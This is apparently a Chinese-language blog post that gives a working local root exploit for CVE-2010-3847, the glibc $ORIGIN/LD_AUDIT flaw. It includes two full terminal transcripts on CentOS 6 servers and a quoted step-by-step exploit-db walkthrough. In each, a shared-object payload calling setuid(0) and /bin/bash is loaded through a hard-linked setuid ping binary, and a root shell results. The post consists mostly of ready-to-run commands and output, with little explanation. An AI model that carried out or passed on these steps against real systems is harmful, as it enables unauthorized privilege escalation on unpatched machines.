linux(cve-2010-3847)漏洞和利用方法,linux（CVE-2010-3847）漏洞和利用方法

【linux提权记录】 存在危险的linux系统: [root@dbserver a]# cat /etc/redhat-release CentOS release 6.3 (Final) [root@dbserver a]# uname -a Linux dbserver 2.6.32-279.5.2.el6.i686 #1 SMP Thu Aug 23 22:16:48 UTC 2012 i686 i686 i386 GNU/Linux 【

【linux提权记录】

存在危险的linux系统:

[root@dbserver a]# cat /etc/redhat-release

CentOS release 6.3 (Final)

[root@dbserver a]# uname -a

Linux dbserver 2.6.32-279.5.2.el6.i686 #1 SMP Thu Aug 23 22:16:48 UTC 2012 i686 i686 i386 GNU/Linux

【提权过程记录】

[root@dbserver a]# useradd test

[root@dbserver a]# passwd test

Changing password for user test.

New password:

BAD PASSWORD: it is based on a dictionary word

BAD PASSWORD: is too simple

Retype new password:

passwd: all authentication tokens updated successfully.

[root@dbserver a]# su  - test

[test@dbserver ~]$ ls

[test@dbserver ~]$ cd /tmp/

[test@dbserver tmp]$ mkdir exploit

[test@dbserver tmp]$ cd exploit/

[test@dbserver exploit]$ ln /bin/ping /tmp/exploit/target

[test@dbserver exploit]$ exec 3< /tmp/exploit/target

[test@dbserver exploit]$ ls -al

total 48

drwxrwxr-x   2 test test  4096 Jan  4 19:49 .

drwxrwxrwt. 37 root root  4096 Jan  4 19:49 ..

-rwsr-xr-x.  2 root root 36892 Jul 18  2011 target

[test@dbserver exploit]$ ls -l /proc/$$/fd/3

lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target

[test@dbserver exploit]$ cd ..

[test@dbserver tmp]$ rm -rf /tmp/exploit/

[test@dbserver tmp]$ ls -l /proc/$$/fd/3

lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)

[test@dbserver tmp]$ ls -l /proc/$$/fd/3

lr-x------ 1 test test 64 Jan  4 19:50 /proc/16369/fd/3 -> /tmp/exploit/target (deleted)

[test@dbserver tmp]$ cat > payload.c

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

^D#按ctrl+D键

[test@dbserver tmp]$ gcc -w -fPIC -shared -o /tmp/exploit payload.c

[test@dbserver tmp]$ ls -l /tmp/exploit

-rwxrwxr-x 1 test test 4163 Jan  4 19:53 /tmp/exploit

[test@dbserver tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.

Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]

[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]

[-M mtu discovery hint] [-S sndbuf]

[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination

[root@dbserver a]# whoami

root

[root@dbserver a]# id

uid=0(root) gid=0(root) groups=0(root)

【第二次测试过程记录】

[root@91hpay ~]# useradd test

[root@91hpay ~]# passwd test

Changing password for user test.

New password:

BAD PASSWORD: it is based on a dictionary word

BAD PASSWORD: is too simple

Retype new password:

passwd: all authentication tokens updated successfully.

[root@91hpay ~]# su - test

[test@91hpay ~]$ cd /tmp/

[test@91hpay tmp]$ mkdir test

[test@91hpay tmp]$ cd test/

[test@91hpay test]$ ln /bin/ping /tmp/test/test

[test@91hpay test]$ cd ..

[test@91hpay tmp]$ exec 3< /tmp/test/test

[test@91hpay tmp]$ ls -al /tmp/test/test

-rwsr-xr-x. 2 root root 41432 Nov 12  2010 /tmp/test/test

[test@91hpay tmp]$ ls -l /proc/$$/fd/3

lr-x------. 1 test test 64 Jan  5 12:05 /proc/19378/fd/3 -> /tmp/test/test

[test@91hpay tmp]$ rm -rf /tmp/test

[test@91hpay tmp]$ ls -l /proc/$$/fd/3

lr-x------. 1 test test 64 Jan  5 12:05 /proc/19378/fd/3 -> /tmp/test/test (deleted)

[test@91hpay tmp]$ cat > payload.c

void __attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c

payload.c:5: error: redefinition of ‘init’

payload.c:1: note: previous definition of ‘init’ was here

[test@91hpay tmp]$ ls -l /tmp/test

ls: cannot access /tmp/test: No such file or directory

[test@91hpay tmp]$ vi payload.c

[test@91hpay tmp]$ ls -al payload.c

-rw-rw-r--. 1 test test 77 Jan  5 12:09 payload.c

[test@91hpay tmp]$ gcc -w -fPIC -shared -o /tmp/test payload.c

[test@91hpay tmp]$ ls -al /tmp/test

-rwxrwxr-x. 1 test test 6020 Jan  5 12:09 /tmp/test

[test@91hpay tmp]$ LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

ERROR: ld.so: object '$ORIGIN' cannot be loaded as audit interface: cannot open shared object file; ignored.

[root@91hpay ~]# id

uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) context=unconfined_u:unconfined_r:unconfined_t:s0-s0:c0.c1023

[root@91hpay ~]# cat /etc/redhat-release

CentOS Linux release 6.0 (Final)

[root@91hpay ~]# uname -a

Linux 91hpay.com 2.6.32-71.el6.x86_64 #1 SMP Fri May 20 03:51:51 BST 2011 x86_64 x86_64 x86_64 GNU/Linux

【过程介召】

这个漏洞主要针对Linux操作系统，已经出来了一段时间了，只需寻找一下是否带有用户s权限的文件，若包含基本可以提权成功，

下面是具体方法：

$ORIGIN是代表在文件系统多级结构中所加载的可执行程序的位置的ELF替换序列。glibc的动态链接器展开特权应用的$ORIGIN替换的方式存在漏洞，本地用户可以通过创建到setuid应用的硬链接并通过LD_AUDIT强制展开$ORIGIN来获得权限提升，

具体过程如下：

#

在/tmp下创建可控制的目录

$ mkdir /tmp/exploit

# 链接到suid二进制程序以更改$ORIGIN的定义

$

ln /bin/ping /tmp/exploit/target

# 打开到目标二进制程序的文件描述符

$ exec 3<

/tmp/exploit/target

# 现在可通过/proc访问描述符

$ ls -l /proc/$$/fd/3

lr-x------ 1 taviso taviso 64 Oct 15 09:21 /proc/10836/fd/3 ->

/tmp/exploit/target*

# 删除之前所创建的目录

$ rm -rf /tmp/exploit/

#

/proc链接仍存在，但已标记为已被删除

$ ls -l /proc/$$/fd/3

lr-x------ 1 taviso taviso 64

Oct 15 09:21 /proc/10836/fd/3 -> /tmp/exploit/target (deleted)

#

使用负载DSO替换目录，使$ORIGIN成为到dlopen()的有效目标

$ cat > payload.c

void

__attribute__((constructor)) init()

{

setuid(0);

system("/bin/bash");

}

^D

$ gcc -w -fPIC -shared -o /tmp/exploit

payload.c

$ ls -l /tmp/exploit

-rwxrwx--- 1 taviso taviso 4.2K Oct 15

09:22 /tmp/exploit*

# 通过LD_AUDIT强制/proc中的链接加载$ORIGIN

$

LD_AUDIT="\$ORIGIN" exec /proc/self/fd/3

sh-4.1# whoami

root

sh-4.1#

id

uid=0(root) gid=500(taviso)

http://www.exploit-db.com/exploits/15274/